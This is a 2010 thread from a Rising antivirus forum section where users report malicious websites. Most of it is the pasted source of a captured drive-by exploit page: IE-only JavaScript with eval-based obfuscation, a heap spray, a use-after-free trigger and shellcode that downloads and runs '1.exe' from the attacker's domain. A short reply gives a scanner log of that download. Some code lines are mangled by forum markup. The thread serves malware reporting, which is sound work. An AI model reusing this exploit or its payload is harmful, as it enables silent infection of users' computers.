瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » http://www.u88.is.com/ie.html
悠悠Wǒ╭心 - 2010-10-22 21:54:00
<html>
        <head>
            <script>
           
            var obj, event_obj;
           
            function spray_heap()
            {
                var chunk_size, payload, nopsled;
                chunk_size = 0x80000;
  payload = "CUTE00E8CUTE0000CUTE6A00CUTEEB03CUTE7E21CUTEE2D8CUTE9873CUTE8AFECUTE8E0ECUTE0E4ECUTE55ECCUTE4C52CUTE4F4DCUTE004ECUTE3600CUTE2F1ACUTE6370CUTE5C3ACUTE2E63CUTE7865CUTE0065CUTE5F59CUTE67AFCUTEA164CUTE0030CUTE408BCUTE8B0CCUTE1C70CUTE8BADCUTE0868CUTE8B51CUTE3C75CUTE748BCUTE782ECUTEF503CUTE8B56CUTE2076CUTEF503CUTEC933CUTE4149CUTE03ADCUTE33C5CUTE0FDBCUTE10BECUTEF238CUTE0874CUTECBC1CUTE030DCUTE40DACUTEF1EBCUTE1F3BCUTEE775CUTE8B5ECUTE245ECUTEDD03CUTE8B66CUTE4B0CCUTE5E8BCUTE031CCUTE8BDDCUTE8B04CUTEC503CUTE59ABCUTEBCE2CUTE0F8BCUTEF980CUTE7463CUTE570ACUTED0FFCUTEAF95CUTE6AAFCUTEEB01CUTE52ACCUTE5752CUTE8F8DCUTE10DBCUTE0040CUTEE981CUTE104ECUTE0040CUTE5251CUTED0FFCUTE016ACUTEFF57CUTEEC57CUTE57FFCUTE90E8CUTE7468CUTE7074CUTE2f3aCUTE772fCUTE7777CUTE752eCUTE3838CUTE692eCUTE2e73CUTE6f63CUTE2f6dCUTE6563CUTE7472CUTE312fCUTE652eCUTE6578";
  var sss = Array(590,485,570,160,495,585,580,505,565,565,160,305,160,585,550,505,575,495,485,560,505,200,560,485,605,540,555,485,500,230,570,505,560,540,485,495,505,200,235,335,425,420,345,235,515,320,160,170,185,585,170,205,205,295,160,550,555,560,575,540,505,500,160,305,160,585,550,505,575,495,485,560,505,200,170,185,585,240,485,240,485,185,585,240,485,240,485,170,205,295);
  var arr = new Array;
  for (var i = 0; i < sss.length; i ++ ){
    arr = String.fromCharCode(sss/5); } var cc=arr.toString();cc=cc.replace(/,/g, "");
    cc = cc.replace([url=]/@/g[/url], ",");
    eval(cc);
                while (nopsled.length < chunk_size)
                    nopsled += nopsled;
                nopsled_len = chunk_size - (cuteqq.length + 20);   
                nopsled = nopsled.substring(0, nopsled_len);
                heap_chunks = new Array();
                for (var i = 0 ; i < 200 ; i++)
                    heap_chunks = nopsled + cuteqq;
            }
       
            function initialize()
            {
                obj = new Array();
                event_obj = null;
                for (var i = 0; i < 200 ; i++ )
                    obj = document.createElement("COMMENT");
            }
       
            function ev1(evt)
            {
                event_obj = document.createEventObject(evt);
                document.getElementById("sp1").innerHTML = "";
                window.setInterval(ev2, 1);
            }
     
            function ev2()
            {
                var data, tmp;
               
                data = "";
                tmp = unescape("%u0a0a%u0a0a");
                for (var i = 0 ; i < 4 ; i++)
                    data += tmp;
                for (i = 0 ; i < obj.length ; i++ ) {
                    obj.data = data;
                }
                event_obj.srcElement;
            }
                   
            function check()
            {
                if (navigator.userAgent.indexOf("MSIE") == -1)
                    return false;
                return true; 
            }
           
            if (check()) {
                initialize();
                spray_heap();             
            }
            else
                window.location = 'about:blank'
               
            </script>
        </head>
        <body>
            <span id="sp1">
            <img src="XIGUA.GIF" >
            </span>       
        </body>
        </html>

用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; CIBA)
09kaka - 2010-10-24 20:42:00
Log is generated by FreShow.
[wide]http://www.u88.is.com/ie.html
    [object]http://www.u88.is.com/cert/1.exe
1
查看完整版本: http://www.u88.is.com/ie.html
© 2000 - 2024 Rising Corp. Ltd.